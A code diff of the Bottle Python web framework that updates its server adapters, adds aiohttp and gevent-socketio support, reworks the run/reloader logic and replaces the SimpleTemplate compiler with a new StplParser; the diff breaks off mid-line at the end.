make_default_app_wrapper('patch') error = make_default_app_wrapper('error') mount = make_default_app_wrapper('mount') hook = make_default_app_wrapper('hook') @@ -2336,12 +2833,6 @@ install = make_default_app_wrapper('install') uninstall = make_default_app_wrapper('uninstall') url = make_default_app_wrapper('get_url') - - - - - - ############################################################################### # Server Adapter ############################################################### ############################################################################### @@ -2349,51 +2840,93 @@ url = make_default_app_wrapper('get_url') class ServerAdapter(object): quiet = False - def __init__(self, host='127.0.0.1', port=8080, **config): - self.options = config + + def __init__(self, host='127.0.0.1', port=8080, **options): + self.options = options self.host = host self.port = int(port) - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover pass def __repr__(self): - args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()]) + args = ', '.join(['%s=%s' % (k, repr(v)) + for k, v in self.options.items()]) return "%s(%s)" % (self.__class__.__name__, args) class CGIServer(ServerAdapter): quiet = True - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover from wsgiref.handlers import CGIHandler + def fixed_environ(environ, start_response): environ.setdefault('PATH_INFO', '') return handler(environ, start_response) + CGIHandler().run(fixed_environ) class FlupFCGIServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover import flup.server.fcgi self.options.setdefault('bindAddress', (self.host, self.port)) flup.server.fcgi.WSGIServer(handler, **self.options).run() class WSGIRefServer(ServerAdapter): - def run(self, handler): # pragma: no cover - from wsgiref.simple_server import make_server, WSGIRequestHandler - if self.quiet: - class QuietHandler(WSGIRequestHandler): - def log_request(*args, **kw): pass - self.options['handler_class'] = QuietHandler - srv = make_server(self.host, self.port, handler, **self.options) - srv.serve_forever() + def run(self, app): # pragma: no cover + from wsgiref.simple_server import make_server + from wsgiref.simple_server import WSGIRequestHandler, WSGIServer + import socket + + class FixedHandler(WSGIRequestHandler): + def address_string(self): # Prevent reverse DNS lookups please. + return self.client_address[0] + + def log_request(*args, **kw): + if not self.quiet: + return WSGIRequestHandler.log_request(*args, **kw) + + handler_cls = self.options.get('handler_class', FixedHandler) + server_cls = self.options.get('server_class', WSGIServer) + + if ':' in self.host: # Fix wsgiref for IPv6 addresses. + if getattr(server_cls, 'address_family') == socket.AF_INET: + + class server_cls(server_cls): + address_family = socket.AF_INET6 + + self.srv = make_server(self.host, self.port, app, server_cls, + handler_cls) + self.port = self.srv.server_port # update port actual port (0 means random) + try: + self.srv.serve_forever() + except KeyboardInterrupt: + self.srv.server_close() # Prevent ResourceWarning: unclosed socket + raise class CherryPyServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover from cherrypy import wsgiserver - server = wsgiserver.CherryPyWSGIServer((self.host, self.port), handler) + self.options['bind_addr'] = (self.host, self.port) + self.options['wsgi_app'] = handler + + certfile = self.options.get('certfile') + if certfile: + del self.options['certfile'] + keyfile = self.options.get('keyfile') + if keyfile: + del self.options['keyfile'] + + server = wsgiserver.CherryPyWSGIServer(**self.options) + if certfile: + server.ssl_certificate = certfile + if keyfile: + server.ssl_private_key = keyfile + try: server.start() finally: @@ -2403,17 +2936,17 @@ class CherryPyServer(ServerAdapter): class WaitressServer(ServerAdapter): def run(self, handler): from waitress import serve - serve(handler, host=self.host, port=self.port) + serve(handler, host=self.host, port=self.port, _quiet=self.quiet) class PasteServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover from paste import httpserver - if not self.quiet: - from paste.translogger import TransLogger - handler = TransLogger(handler) - httpserver.serve(handler, host=self.host, port=str(self.port), - **self.options) + from paste.translogger import TransLogger + handler = TransLogger(handler, setup_console_handler=(not self.quiet)) + httpserver.serve(handler, + host=self.host, + port=str(self.port), **self.options) class MeinheldServer(ServerAdapter): @@ -2425,7 +2958,8 @@ class MeinheldServer(ServerAdapter): class FapwsServer(ServerAdapter): """ Extremely fast webserver using libev. See http://www.fapws.org/ """ - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover import fapws._evwsgi as evwsgi from fapws import base, config port = self.port @@ -2438,26 +2972,30 @@ class FapwsServer(ServerAdapter): _stderr("WARNING: Auto-reloading does not work with Fapws3.\n") _stderr(" (Fapws3 breaks python thread support)\n") evwsgi.set_base_module(base) + def app(environ, start_response): environ['wsgi.multiprocess'] = False return handler(environ, start_response) + evwsgi.wsgi_cb(('', app)) evwsgi.run() class TornadoServer(ServerAdapter): """ The super hyped asynchronous server by facebook. Untested. """ - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover import tornado.wsgi, tornado.httpserver, tornado.ioloop container = tornado.wsgi.WSGIContainer(handler) server = tornado.httpserver.HTTPServer(container) - server.listen(port=self.port) + server.listen(port=self.port, address=self.host) tornado.ioloop.IOLoop.instance().start() class AppEngineServer(ServerAdapter): """ Adapter for Google App Engine. """ quiet = True + def run(self, handler): from google.appengine.ext.webapp import util # A main() function in the handler script enables 'App Caching'. @@ -2470,6 +3008,7 @@ class AppEngineServer(ServerAdapter): class TwistedServer(ServerAdapter): """ Untested. """ + def run(self, handler): from twisted.web import server, wsgi from twisted.python.threadpool import ThreadPool @@ -2479,11 +3018,13 @@ class TwistedServer(ServerAdapter): reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop) factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler)) reactor.listenTCP(self.port, factory, interface=self.host) - reactor.run() + if not reactor.running: + reactor.run() class DieselServer(ServerAdapter): """ Untested. """ + def run(self, handler): from diesel.protocols.wsgi import WSGIApplication app = WSGIApplication(handler, port=self.port) @@ -2495,19 +3036,34 @@ class GeventServer(ServerAdapter): * `fast` (default: False) uses libevent's http server, but has some issues: No streaming, no pipelining, no SSL. + * See gevent.wsgi.WSGIServer() documentation for more options. """ + def run(self, handler): from gevent import wsgi, pywsgi, local - if not isinstance(_lctx, local.local): + if not isinstance(threading.local(), local.local): msg = "Bottle requires gevent.monkey.patch_all() (before import)" raise RuntimeError(msg) - if not self.options.get('fast'): wsgi = pywsgi - log = None if self.quiet else 'default' - wsgi.WSGIServer((self.host, self.port), handler, log=log).serve_forever() + if not self.options.pop('fast', None): wsgi = pywsgi + self.options['log'] = None if self.quiet else 'default' + address = (self.host, self.port) + server = wsgi.WSGIServer(address, handler, **self.options) + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: server.stop()) + server.serve_forever() + + +class GeventSocketIOServer(ServerAdapter): + def run(self, handler): + from socketio import server + address = (self.host, self.port) + server.SocketIOServer(address, handler, **self.options).serve_forever() class GunicornServer(ServerAdapter): """ Untested. See http://gunicorn.org/configure.html for options. """ + def run(self, handler): from gunicorn.app.base import Application @@ -2525,35 +3081,87 @@ class GunicornServer(ServerAdapter): class EventletServer(ServerAdapter): - """ Untested """ + """ Untested. Options: + + * `backlog` adjust the eventlet backlog parameter which is the maximum + number of queued connections. Should be at least 1; the maximum + value is system-dependent. + * `family`: (default is 2) socket family, optional. See socket + documentation for available families. + """ + def run(self, handler): - from eventlet import wsgi, listen + from eventlet import wsgi, listen, patcher + if not patcher.is_monkey_patched(os): + msg = "Bottle requires eventlet.monkey_patch() (before import)" + raise RuntimeError(msg) + socket_args = {} + for arg in ('backlog', 'family'): + try: + socket_args[arg] = self.options.pop(arg) + except KeyError: + pass + address = (self.host, self.port) try: - wsgi.server(listen((self.host, self.port)), handler, + wsgi.server(listen(address, **socket_args), handler, log_output=(not self.quiet)) except TypeError: # Fallback, if we have old version of eventlet - wsgi.server(listen((self.host, self.port)), handler) + wsgi.server(listen(address), handler) class RocketServer(ServerAdapter): """ Untested. """ + def run(self, handler): from rocket import Rocket - server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler }) + server = Rocket((self.host, self.port), 'wsgi', {'wsgi_app': handler}) server.start() class BjoernServer(ServerAdapter): """ Fast server written in C: https://github.com/jonashaag/bjoern """ + def run(self, handler): from bjoern import run run(handler, self.host, self.port) +class AiohttpServer(ServerAdapter): + """ Untested. + aiohttp + https://pypi.python.org/pypi/aiohttp/ + """ + + def run(self, handler): + import asyncio + from aiohttp.wsgi import WSGIServerHttpProtocol + self.loop = asyncio.new_event_loop() + asyncio.set_event_loop(self.loop) + + protocol_factory = lambda: WSGIServerHttpProtocol( + handler, + readpayload=True, + debug=(not self.quiet)) + self.loop.run_until_complete(self.loop.create_server(protocol_factory, + self.host, + self.port)) + + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: self.loop.stop()) + + try: + self.loop.run_forever() + except KeyboardInterrupt: + self.loop.stop() + + class AutoServer(ServerAdapter): """ Untested. """ - adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer] + adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, + WSGIRefServer] + def run(self, handler): for sa in self.adapters: try: @@ -2561,6 +3169,7 @@ class AutoServer(ServerAdapter): except ImportError: pass + server_names = { 'cgi': CGIServer, 'flup': FlupFCGIServer, @@ -2577,16 +3186,13 @@ server_names = { 'gunicorn': GunicornServer, 'eventlet': EventletServer, 'gevent': GeventServer, + 'geventSocketIO': GeventSocketIOServer, 'rocket': RocketServer, - 'bjoern' : BjoernServer, + 'bjoern': BjoernServer, + 'aiohttp': AiohttpServer, 'auto': AutoServer, } - - - - - ############################################################################### # Application Control ########################################################## ############################################################################### @@ -2616,19 +3222,30 @@ def load_app(target): """ Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter. """ - global NORUN; NORUN, nr_old = True, NORUN + global NORUN + NORUN, nr_old = True, NORUN + tmp = default_app.push() # Create a new "default application" try: - tmp = default_app.push() # Create a new "default application" - rv = load(target) # Import the target module + rv = load(target) # Import the target module return rv if callable(rv) else tmp finally: - default_app.remove(tmp) # Remove the temporary added default application + default_app.remove(tmp) # Remove the temporary added default application NORUN = nr_old + _debug = debug -def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, - interval=1, reloader=False, quiet=False, plugins=None, - debug=False, **kargs): + + +def run(app=None, + server='wsgiref', + host='127.0.0.1', + port=8080, + interval=1, + reloader=False, + quiet=False, + plugins=None, + debug=None, + config=None, **kargs): """ Start a server instance. This method blocks until the server terminates. :param app: WSGI application or target string supported by @@ -2647,18 +3264,19 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, """ if NORUN: return if reloader and not os.environ.get('BOTTLE_CHILD'): + import subprocess + lockfile = None try: - lockfile = None fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock') - os.close(fd) # We only need this file to exist. We never write to it + os.close(fd) # We only need this file to exist. We never write to it while os.path.exists(lockfile): args = [sys.executable] + sys.argv environ = os.environ.copy() environ['BOTTLE_CHILD'] = 'true' environ['BOTTLE_LOCKFILE'] = lockfile p = subprocess.Popen(args, env=environ) - while p.poll() is None: # Busy wait... - os.utime(lockfile, None) # I am alive! + while p.poll() is None: # Busy wait... + os.utime(lockfile, None) # I am alive! time.sleep(interval) if p.poll() != 3: if os.path.exists(lockfile): os.unlink(lockfile) @@ -2671,7 +3289,7 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, return try: - _debug(debug) + if debug is not None: _debug(debug) app = app or default_app() if isinstance(app, basestring): app = load_app(app) @@ -2679,8 +3297,13 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, raise ValueError("Application is not callable: %r" % app) for plugin in plugins or []: + if isinstance(plugin, basestring): + plugin = load(plugin) app.install(plugin) + if config: + app.config.update(config) + if server in server_names: server = server_names.get(server) if isinstance(server, basestring): @@ -2692,8 +3315,10 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, server.quiet = server.quiet or quiet if not server.quiet: - _stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server))) - _stderr("Listening on http://%s:%d/\n" % (server.host, server.port)) + _stderr("Bottle v%s server starting up (using %s)...\n" % + (__version__, repr(server))) + _stderr("Listening on http://%s:%d/\n" % + (server.host, server.port)) _stderr("Hit Ctrl-C to quit.\n\n") if reloader: @@ -2717,20 +3342,20 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, sys.exit(3) - class FileCheckerThread(threading.Thread): - ''' Interrupt main-thread as soon as a changed module file is detected, - the lockfile gets deleted or gets to old. ''' + """ Interrupt main-thread as soon as a changed module file is detected, + the lockfile gets deleted or gets to old. """ def __init__(self, lockfile, interval): threading.Thread.__init__(self) + self.daemon = True self.lockfile, self.interval = lockfile, interval #: Is one of 'reload', 'error' or 'exit' self.status = None def run(self): exists = os.path.exists - mtime = lambda path: os.stat(path).st_mtime + mtime = lambda p: os.stat(p).st_mtime files = dict() for module in list(sys.modules.values()): @@ -2753,15 +3378,11 @@ class FileCheckerThread(threading.Thread): def __enter__(self): self.start() - def __exit__(self, exc_type, exc_val, exc_tb): - if not self.status: self.status = 'exit' # silent exit + def __exit__(self, exc_type, *_): + if not self.status: self.status = 'exit' # silent exit self.join() return exc_type is not None and issubclass(exc_type, KeyboardInterrupt) - - - - ############################################################################### # Template Adapters ############################################################ ############################################################################### @@ -2774,11 +3395,15 @@ class TemplateError(HTTPError): class BaseTemplate(object): """ Base class and minimal API for template adapters """ - extensions = ['tpl','html','thtml','stpl'] - settings = {} #used in prepare() - defaults = {} #used in render() + extensions = ['tpl', 'html', 'thtml', 'stpl'] + settings = {} #used in prepare() + defaults = {} #used in render() - def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings): + def __init__(self, + source=None, + name=None, + lookup=None, + encoding='utf8', **settings): """ Create a new template. If the source parameter (str or buffer) is missing, the name argument is used to guess a template filename. Subclasses can assume that @@ -2792,10 +3417,10 @@ class BaseTemplate(object): self.name = name self.source = source.read() if hasattr(source, 'read') else source self.filename = source.filename if hasattr(source, 'filename') else None - self.lookup = [os.path.abspath(x) for x in lookup] + self.lookup = [os.path.abspath(x) for x in lookup] if lookup else [] self.encoding = encoding - self.settings = self.settings.copy() # Copy from class variable - self.settings.update(settings) # Apply + self.settings = self.settings.copy() # Copy from class variable + self.settings.update(settings) # Apply if not self.source and self.name: self.filename = self.search(self.name, self.lookup) if not self.filename: @@ -2805,15 +3430,16 @@ class BaseTemplate(object): self.prepare(**self.settings) @classmethod - def search(cls, name, lookup=[]): + def search(cls, name, lookup=None): """ Search name in all directories specified in lookup. First without, then with common extensions. Return first hit. """ if not lookup: - depr('The template lookup path list should not be empty.') + depr('The template lookup path list should not be empty.', + True) #0.12 lookup = ['.'] if os.path.isabs(name) and os.path.isfile(name): - depr('Absolute template path names are deprecated.') + depr('Absolute template path names are deprecated.', True) #0.12 return os.path.abspath(name) for spath in lookup: @@ -2827,9 +3453,9 @@ class BaseTemplate(object): @classmethod def global_config(cls, key, *args): - ''' This reads or sets the global settings stored in class.settings. ''' + """ This reads or sets the global settings stored in class.settings. """ if args: - cls.settings = cls.settings.copy() # Make settings local to class + cls.settings = cls.settings.copy() # Make settings local to class cls.settings[key] = args[0] else: return cls.settings[key] @@ -2845,8 +3471,8 @@ class BaseTemplate(object): """ Render the template with the specified local variables and return a single byte or unicode string. If it is a byte string, the encoding must match self.encoding. This method must be thread-safe! - Local variables may be provided in dictionaries (*args) - or directly, as keywords (**kwargs). + Local variables may be provided in dictionaries (args) + or directly, as keywords (kwargs). """ raise NotImplementedError @@ -2855,16 +3481,19 @@ class MakoTemplate(BaseTemplate): def prepare(self, **options): from mako.template import Template from mako.lookup import TemplateLookup - options.update({'input_encoding':self.encoding}) + options.update({'input_encoding': self.encoding}) options.setdefault('format_exceptions', bool(DEBUG)) lookup = TemplateLookup(directories=self.lookup, **options) if self.source: self.tpl = Template(self.source, lookup=lookup, **options) else: - self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options) + self.tpl = Template(uri=self.name, + filename=self.filename, + lookup=lookup, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) @@ -2882,7 +3511,8 @@ class CheetahTemplate(BaseTemplate): self.tpl = Template(file=self.filename, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) self.context.vars.update(self.defaults) self.context.vars.update(kwargs) out = str(self.tpl) @@ -2891,21 +3521,20 @@ class CheetahTemplate(BaseTemplate): class Jinja2Template(BaseTemplate): - def prepare(self, filters=None, tests=None, **kwargs): + def prepare(self, filters=None, tests=None, globals={}, **kwargs): from jinja2 import Environment, FunctionLoader - if 'prefix' in kwargs: # TODO: to be removed after a while - raise RuntimeError('The keyword argument `prefix` has been removed. ' - 'Use the full jinja2 environment name line_statement_prefix instead.') self.env = Environment(loader=FunctionLoader(self.loader), **kwargs) if filters: self.env.filters.update(filters) if tests: self.env.tests.update(tests) + if globals: self.env.globals.update(globals) if self.source: self.tpl = self.env.from_string(self.source) else: self.tpl = self.env.get_template(self.filename) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) @@ -2917,191 +3546,277 @@ class Jinja2Template(BaseTemplate): return f.read().decode(self.encoding) -class SimpleTALTemplate(BaseTemplate): - ''' Deprecated, do not use. ''' - def prepare(self, **options): - depr('The SimpleTAL template handler is deprecated'\ - ' and will be removed in 0.12') - from simpletal import simpleTAL - if self.source: - self.tpl = simpleTAL.compileHTMLTemplate(self.source) - else: - with open(self.filename, 'rb') as fp: - self.tpl = simpleTAL.compileHTMLTemplate(tonat(fp.read())) - - def render(self, *args, **kwargs): - from simpletal import simpleTALES - for dictarg in args: kwargs.update(dictarg) - context = simpleTALES.Context() - for k,v in self.defaults.items(): - context.addGlobal(k, v) - for k,v in kwargs.items(): - context.addGlobal(k, v) - output = StringIO() - self.tpl.expand(context, output) - return output.getvalue() - - class SimpleTemplate(BaseTemplate): - blocks = ('if', 'elif', 'else', 'try', 'except', 'finally', 'for', 'while', - 'with', 'def', 'class') - dedent_blocks = ('elif', 'else', 'except', 'finally') - - @lazy_attribute - def re_pytokens(cls): - ''' This matches comments and all kinds of quoted strings but does - NOT match comments (#...) within quoted strings. (trust me) ''' - return re.compile(r''' - (''(?!')|""(?!")|'{6}|"{6} # Empty strings (all 4 types) - |'(?:[^\\']|\\.)+?' # Single quotes (') - |"(?:[^\\"]|\\.)+?" # Double quotes (") - |'{3}(?:[^\\]|\\.|\n)+?'{3} # Triple-quoted strings (') - |"{3}(?:[^\\]|\\.|\n)+?"{3} # Triple-quoted strings (") - |\#.* # Comments - )''', re.VERBOSE) - - def prepare(self, escape_func=html_escape, noescape=False, **kwargs): + def prepare(self, + escape_func=html_escape, + noescape=False, + syntax=None, **ka): self.cache = {} enc = self.encoding self._str = lambda x: touni(x, enc) self._escape = lambda x: escape_func(touni(x, enc)) + self.syntax = syntax if noescape: self._str, self._escape = self._escape, self._str - @classmethod - def split_comment(cls, code): - """ Removes comments (#...) from python code. """ - if '#' not in code: return code - #: Remove comments only (leave quoted strings as they are) - subf = lambda m: '' if m.group(0)[0]=='#' else m.group(0) - return re.sub(cls.re_pytokens, subf, code) - @cached_property def co(self): return compile(self.code, self.filename or '<string>', 'exec') @cached_property def code(self): - stack = [] # Current Code indentation - lineno = 0 # Current line of code - ptrbuffer = [] # Buffer for printable strings and token tuple instances - codebuffer = [] # Buffer for generated python code - multiline = dedent = oneline = False - template = self.source or open(self.filename, 'rb').read() + source = self.source + if not source: + with open(self.filename, 'rb') as f: + source = f.read() + try: + source, encoding = touni(source), 'utf8' + except UnicodeError: + depr('Template encodings other than utf8 are not supported.') #0.11 + source, encoding = touni(source, 'latin1'), 'latin1' + parser = StplParser(source, encoding=encoding, syntax=self.syntax) + code = parser.translate() + self.encoding = parser.encoding + return code - def yield_tokens(line): - for i, part in enumerate(re.split(r'\{\{(.*?)\}\}', line)): - if i % 2: - if part.startswith('!'): yield 'RAW', part[1:] - else: yield 'CMD', part - else: yield 'TXT', part + def _rebase(self, _env, _name=None, **kwargs): + _env['_rebase'] = (_name, kwargs) - def flush(): # Flush the ptrbuffer - if not ptrbuffer: return - cline = '' - for line in ptrbuffer: - for token, value in line: - if token == 'TXT': cline += repr(value) - elif token == 'RAW': cline += '_str(%s)' % value - elif token == 'CMD': cline += '_escape(%s)' % value - cline += ', ' - cline = cline[:-2] + '\\\n' - cline = cline[:-2] - if cline[:-1].endswith('\\\\\\\\\\n'): - cline = cline[:-7] + cline[-1] # 'nobr\\\\\n' --> 'nobr' - cline = '_printlist([' + cline + '])' - del ptrbuffer[:] # Do this before calling code() again - code(cline) - - def code(stmt): - for line in stmt.splitlines(): - codebuffer.append(' ' * len(stack) + line.strip()) - - for line in template.splitlines(True): - lineno += 1 - line = touni(line, self.encoding) - sline = line.lstrip() - if lineno <= 2: - m = re.match(r"%\s*#.*coding[:=]\s*([-\w.]+)", sline) - if m: self.encoding = m.group(1) - if m: line = line.replace('coding','coding (removed)') - if sline and sline[0] == '%' and sline[:2] != '%%': - line = line.split('%',1)[1].lstrip() # Full line following the % - cline = self.split_comment(line).strip() - cmd = re.split(r'[^a-zA-Z0-9_]', cline)[0] - flush() # You are actually reading this? Good luck, it's a mess :) - if cmd in self.blocks or multiline: - cmd = multiline or cmd - dedent = cmd in self.dedent_blocks # "else:" - if dedent and not oneline and not multiline: - cmd = stack.pop() - code(line) - oneline = not cline.endswith(':') # "if 1: pass" - multiline = cmd if cline.endswith('\\') else False - if not oneline and not multiline: - stack.append(cmd) - elif cmd == 'end' and stack: - code('#end(%s) %s' % (stack.pop(), line.strip()[3:])) - elif cmd == 'include': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("_=_include(%s, _stdout, %s)" % (repr(p[0]), p[1])) - elif p: - code("_=_include(%s, _stdout)" % repr(p[0])) - else: # Empty %include -> reverse of %rebase - code("_printlist(_base)") - elif cmd == 'rebase': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("globals()['_rebase']=(%s, dict(%s))" % (repr(p[0]), p[1])) - elif p: - code("globals()['_rebase']=(%s, {})" % repr(p[0])) - else: - code(line) - else: # Line starting with text (not '%') or '%%' (escaped) - if line.strip().startswith('%%'): - line = line.replace('%%', '%', 1) - ptrbuffer.append(yield_tokens(line)) - flush() - return '\n'.join(codebuffer) + '\n' - - def subtemplate(self, _name, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + def _include(self, _env, _name=None, **kwargs): + env = _env.copy() + env.update(kwargs) if _name not in self.cache: self.cache[_name] = self.__class__(name=_name, lookup=self.lookup) - return self.cache[_name].execute(_stdout, kwargs) + return self.cache[_name].execute(env['_stdout'], env) - def execute(self, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + def execute(self, _stdout, kwargs): env = self.defaults.copy() - env.update({'_stdout': _stdout, '_printlist': _stdout.extend, - '_include': self.subtemplate, '_str': self._str, - '_escape': self._escape, 'get': env.get, - 'setdefault': env.setdefault, 'defined': env.__contains__}) env.update(kwargs) + env.update({ + '_stdout': _stdout, + '_printlist': _stdout.extend, + 'include': functools.partial(self._include, env), + 'rebase': functools.partial(self._rebase, env), + '_rebase': None, + '_str': self._str, + '_escape': self._escape, + 'get': env.get, + 'setdefault': env.setdefault, + 'defined': env.__contains__ + }) eval(self.co, env) - if '_rebase' in env: - subtpl, rargs = env['_rebase'] - rargs['_base'] = _stdout[:] #copy stdout - del _stdout[:] # clear stdout - return self.subtemplate(subtpl,_stdout,rargs) + if env.get('_rebase'): + subtpl, rargs = env.pop('_rebase') + rargs['base'] = ''.join(_stdout) #copy stdout + del _stdout[:] # clear stdout + return self._include(env, subtpl, **rargs) return env def render(self, *args, **kwargs): """ Render the template using keyword arguments as local variables. """ - for dictarg in args: kwargs.update(dictarg) + env = {} stdout = [] - self.execute(stdout, kwargs) + for dictarg in args: + env.update(dictarg) + env.update(kwargs) + self.execute(stdout, env) return ''.join(stdout) -def template(*args, **kwargs): +class StplSyntaxError(TemplateError): + + pass + + +class StplParser(object): + """ Parser for stpl templates. """ + _re_cache = {} #: Cache for compiled re patterns + + # This huge pile of voodoo magic splits python code into 8 different tokens. + # We use the verbose (?x) regex mode to make this more manageable + + _re_tok = _re_inl = r'''((?mx) # verbose and dot-matches-newline mode + [urbURB]* + (?: ''(?!') + |""(?!") + |'{6} + |"{6} + |'(?:[^\\']|\\.)+?' + |"(?:[^\\"]|\\.)+?" + |'{3}(?:[^\\]|\\.|\n)+?'{3} + |"{3}(?:[^\\]|\\.|\n)+?"{3} + ) + )''' + + _re_inl = _re_tok.replace(r'|\n', '') # We re-use this string pattern later + + _re_tok += r''' + # 2: Comments (until end of line, but not the newline itself) + |(\#.*) + + # 3: Open and close (4) grouping tokens + |([\[\{\(]) + |([\]\}\)]) + + # 5,6: Keywords that start or continue a python block (only start of line) + |^([\ \t]*(?:if|for|while|with|try|def|class)\b) + |^([\ \t]*(?:elif|else|except|finally)\b) + + # 7: Our special 'end' keyword (but only if it stands alone) + |((?:^|;)[\ \t]*end[\ \t]*(?=(?:%(block_close)s[\ \t]*)?\r?$|;|\#)) + + # 8: A customizable end-of-code-block template token (only end of line) + |(%(block_close)s[\ \t]*(?=\r?$)) + + # 9: And finally, a single newline. The 10th token is 'everything else' + |(\r?\n) ''' + + # Match the start tokens of code areas in a template + _re_split = r'''(?m)^[ \t]*(\\?)((%(line_start)s)|(%(block_start)s))''' + # Match inline statements (may contain python strings) + _re_inl = r'''%%(inline_start)s((?:%s|[^'"\n]+?)*?)%%(inline_end)s''' % _re_inl + + default_syntax = '<% %> % {{ }}' + + def __init__(self, source, syntax=None, encoding='utf8'): + self.source, self.encoding = touni(source, encoding), encoding + self.set_syntax(syntax or self.default_syntax) + self.code_buffer, self.text_buffer = [], [] + self.lineno, self.offset = 1, 0 + self.indent, self.indent_mod = 0, 0 + self.paren_depth = 0 + + def get_syntax(self): + """ Tokens as a space separated string (default: <% %> % {{ }}) """ + return self._syntax + + def set_syntax(self, syntax): + self._syntax = syntax + self._tokens = syntax.split() + if not syntax in self._re_cache: + names = 'block_start block_close line_start inline_start inline_end' + etokens = map(re.escape, self._tokens) + pattern_vars = dict(zip(names.split(), etokens)) + patterns = (self._re_split, self._re_tok, self._re_inl) + patterns = [re.compile(p % pattern_vars) for p in patterns] + self._re_cache[syntax] = patterns + self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax] + + syntax = property(get_syntax, set_syntax) + + def translate(self): + if self.offset: raise RuntimeError('Parser is a one time instance.') + while True: + m = self.re_split.search(self.source, pos=self.offset) + if m: + text = self.source[self.offset:m.start()] + self.text_buffer.append(text) + self.offset = m.end() + if m.group(1): # Escape syntax + line, sep, _ = self.source[self.offset:].partition('\n') + self.text_buffer.append(self.source[m.start():m.start(1)] + + m.group(2) + line + sep) + self.offset += len(line + sep) + continue + self.flush_text() + self.offset += self.read_code(self.source[self.offset:], + multiline=bool(m.group(4))) + else: + break + self.text_buffer.append(self.source[self.offset:]) + self.flush_text() + return ''.join(self.code_buffer) + + def read_code(self, pysource, multiline): + code_line, comment = '', '' + offset = 0 + while True: + m = self.re_tok.search(pysource, pos=offset) + if not m: + code_line += pysource[offset:] + offset = len(pysource) + self.write_code(code_line.strip(), comment) + break + code_line += pysource[offset:m.start()] + offset = m.end() + _str, _com, _po, _pc, _blk1, _blk2, _end, _cend, _nl = m.groups() + if self.paren_depth > 0 and (_blk1 or _blk2): # a if b else c + code_line += _blk1 or _blk2 + continue + if _str: # Python string + code_line += _str + elif _com: # Python comment (up to EOL) + comment = _com + if multiline and _com.strip().endswith(self._tokens[1]): + multiline = False # Allow end-of-block in comments + elif _po: # open parenthesis + self.paren_depth += 1 + code_line += _po + elif _pc: # close parenthesis + if self.paren_depth > 0: + # we could check for matching parentheses here, but it's + # easier to leave that to python - just check counts + self.paren_depth -= 1 + code_line += _pc + elif _blk1: # Start-block keyword (if/for/while/def/try/...) + code_line, self.indent_mod = _blk1, -1 + self.indent += 1 + elif _blk2: # Continue-block keyword (else/elif/except/...) + code_line, self.indent_mod = _blk2, -1 + elif _end: # The non-standard 'end'-keyword (ends a block) + self.indent -= 1 + elif _cend: # The end-code-block template token (usually '%>') + if multiline: multiline = False + else: code_line += _cend + else: # \n + self.write_code(code_line.strip(), comment) + self.lineno += 1 + code_line, comment, self.indent_mod = '', '', 0 + if not multiline: + break + + return offset + + def flush_text(self): + text = ''.join(self.text_buffer) + del self.text_buffer[:] + if not text: return + parts, pos, nl = [], 0, '\\\n' + ' ' * self.indent + for m in self.re_inl.finditer(text): + prefix, pos = text[pos:m.start()], m.end() + if prefix: + parts.append(nl.join(map(repr, prefix.splitlines(True)))) + if prefix.endswith('\n'): parts[-1] += nl + parts.append(self.process_inline(m.group(1).strip())) + if pos < len(text): + prefix = text[pos:] + lines = prefix.splitlines(True) + if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3] + elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4] + parts.append(nl.join(map(repr, lines))) + code = '_printlist((%s,))' % ', '.join(parts) + self.lineno += code.count('\n') + 1 + self.write_code(code) + + @staticmethod + def process_inline(chunk): + if chunk[0] == '!': return '_str(%s)' % chunk[1:] + return '_escape(%s)' % chunk + + def write_code(self, line, comment=''): + code = ' ' * (self.indent + self.indent_mod) + code += line.lstrip() + comment + '\n' + self.code_buffer.append(code) + + +def template(*args, **kwargs): + """ Get a rendered template as a string iterator. You can use a name, a filename or a template string as first parameter. Template rendering arguments can be passed as dictionaries or directly (as keyword arguments). - ''' + """ tpl = args[0] if args else None adapter = kwargs.pop('template_adapter', SimpleTemplate) lookup = kwargs.pop('template_lookup', 